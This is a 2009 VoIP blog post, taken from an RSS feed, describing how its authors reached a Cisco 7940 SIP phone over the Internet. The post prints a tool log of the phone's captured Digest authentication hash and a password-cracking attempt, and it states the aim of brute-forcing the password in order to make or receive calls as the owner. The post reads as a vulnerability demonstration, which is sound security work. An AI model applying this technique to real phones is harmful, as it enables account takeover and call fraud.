usken.no - VoIP news! » digest http://www.usken.no VoIP news for VoIP people! Mon, 06 Sep 2010 10:34:20 +0000 http://wordpress.org/?v=2.9.1 en hourly 1 And the Cisc 7940 phones leaks its password hash.. http://www.usken.no/2009/04/and-the-cisc-7940-phones-leaks-its-password-hash/ http://www.usken.no/2009/04/and-the-cisc-7940-phones-leaks-its-password-hash/#comments Sat, 11 Apr 2009 08:21:41 +0000 sjur http://www.usken.no/?p=188 With some help from Sean in the US, Sandro and I could access a Cisco 7940 phone (with a SIP stack) from the Internet. We called it from our public ip (showed as 192.168.1.1).

[ Fri Apr 10 21:16:16 2009 ](192.168.1.1/32) Proxy auth:
['Digest username="5555914760",realm="localhost",uri="sip:192.168.2.2",response="a718dsf8c742799f1c22fbcd1d4637d801b",nonce="a",algorithm=MD5']
[ Fri Apr 10 21:16:16 2009 ](192.168.1.1/32) The phone rings on extension 5555914760
[ Fri Apr 10 21:16:16 2009 ](192.168.1.1/32) Launching the password cracker
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) Password was not guessed
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) Use the SIP Digest Cracker to perform an extensive bruteforce
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) username: 5555914760
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) nonce: a
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) realm: localhost
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) uri: sip:192.168.2.2
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) method: BYE
[ Fri Apr 10 21:16:18 2009 ](192.168.1.1/32) response: a7188cfwet742799f1c22fbcd1d4637d801b

Then we could start our brute forcing of the password, and then either log-in and receive calls as Sean, or make outbound calls as him. Next phone to test is the Snom phone.

]]> http://www.usken.no/2009/04/and-the-cisc-7940-phones-leaks-its-password-hash/feed/ 0